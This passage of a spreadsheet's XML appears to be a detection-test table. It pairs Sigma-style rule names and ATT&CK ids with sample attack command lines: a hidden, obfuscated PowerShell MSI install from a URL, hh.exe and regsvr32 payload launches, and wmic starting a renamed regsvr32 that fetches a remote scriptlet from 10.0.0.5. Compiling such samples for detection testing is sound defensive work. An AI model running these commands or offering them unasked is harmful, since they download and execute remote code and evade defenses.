        </is>
      </c>
      <c r="E434" s="36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F434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I434" s="43" t="n"/>
      <c r="J434" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K434" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="43" t="n"/>
      <c r="B435" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C435" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D435" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E435" s="36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5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I435" s="36" t="n"/>
      <c r="J435" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K435" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="43" t="n"/>
      <c r="B436" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C436" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D436" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E436" s="36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6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I436" s="36" t="n"/>
      <c r="J436" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K436" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="43" t="n"/>
      <c r="B437" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C437" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D437" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E437" s="36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437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I437" s="36" t="n"/>
      <c r="J437" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K437" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="n"/>
      <c r="B438" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C438" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D438" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E438" s="36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438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I438" s="43" t="n"/>
      <c r="J438" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K438" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="43" t="n"/>
      <c r="B439" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C439" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D439" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E439" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I439" s="43" t="n"/>
      <c r="J439" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K439" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="43" t="n"/>
      <c r="B440" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C440" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D440" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E440" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I440" s="36" t="n"/>
      <c r="J440" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K440" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="43" t="n"/>
      <c r="B441" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C441" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D441" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E441" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -wiNDowStyLe Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I441" s="36" t="n"/>
      <c r="J441" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K441" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="43" t="n"/>
      <c r="B442" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C442" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D442" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E442" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I442" s="43" t="n"/>
      <c r="J442" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K442" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="43" t="n"/>
      <c r="B443" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C443" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D443" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E443" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H443" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I443" s="43" t="n"/>
      <c r="J443" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K443" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="43" t="n"/>
      <c r="B444" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C444" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D444" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E444" s="36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444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H444" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I444" s="43" t="n"/>
      <c r="J444" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K444" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="43" t="n"/>
      <c r="B445" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C445" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D445" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E445" s="36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445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="43" t="n"/>
      <c r="J445" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K445" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="43" t="n"/>
      <c r="B446" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C446" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D446" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E446" s="43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446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="43" t="n"/>
      <c r="J446" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K446" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="43" t="n"/>
      <c r="B447" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C447" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D447" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E447" s="36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447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="n"/>
      <c r="J447" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K447" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="36" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B448" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C448" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D448" s="36" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E448" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\Microsoft.NET\Framework\v4.0.30319
egsvcs.exe" C:\Users	haim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="36" t="n"/>
      <c r="J448" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K448" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="36" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B449" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C449" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D449" s="36" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E449" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\Microsoft.NET\Framework\v4.0.30319
egsvcs.exe" C:\Users	haim\AppData\Local\Temp""\T1218.009.dll</t>
        </is>
      </c>
      <c r="F449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="43" t="n"/>
      <c r="J449" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K449" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B450" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C450" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D450" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E450" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="43" t="n"/>
      <c r="J450" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K450" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B451" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C451" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D451" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E451" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="43" t="n"/>
      <c r="J451" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K451" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="36" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B452" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C452" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D452" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E452" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="43" t="n"/>
      <c r="J452" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K452" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B453" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C453" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D453" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E453" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I453" s="43" t="n"/>
      <c r="J453" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K453" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="n"/>
      <c r="B454" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C454" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D454" s="36" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E454" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; regsvr32.exe payload.dll"</t>
        </is>
      </c>
      <c r="F454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I454" s="36" t="n"/>
      <c r="J454" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K454" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B455" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C455" s="36" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D455" s="36" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E455" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\syswow64\regsvr32.exe /s C:\""AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll"</t>
        </is>
      </c>
      <c r="F455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="43" t="n"/>
      <c r="J455" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K455" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="36" t="n"/>
      <c r="B456" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C456" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D456" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E456" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="43" t="n"/>
      <c r="J456" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K456" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="n"/>
      <c r="B457" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C457" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D457" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E457" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="43" t="n"/>
      <c r="J457" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K457" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="36" t="n"/>
      <c r="B458" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C458" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D458" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E458" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="43" t="n"/>
      <c r="J458" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K458" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="n"/>
      <c r="B459" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C459" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D459" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E459" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="43" t="n"/>
      <c r="J459" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K459" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="36" t="n"/>
      <c r="B460" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C460" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D460" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E460" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I460" s="43" t="n"/>
      <c r="J460" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K460" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="n"/>
      <c r="B461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C461" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D461" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E461" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //NoLOGO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I461" s="43" t="n"/>
      <c r="J461" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K461" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="36" t="n"/>
      <c r="B462" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C462" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D462" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E462" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript /"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I462" s="43" t="n"/>
      <c r="J462" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K462" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="36" t="n"/>
      <c r="B463" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C463" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D463" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E463" s="36" t="inlineStr">
        <is>
